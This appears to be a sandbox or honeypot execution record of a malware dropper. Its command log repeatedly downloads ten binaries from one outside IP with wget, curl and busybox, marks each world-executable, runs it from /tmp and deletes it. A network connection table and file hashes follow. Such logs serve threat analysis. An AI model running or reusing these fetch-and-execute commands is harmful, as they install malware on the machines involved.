[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |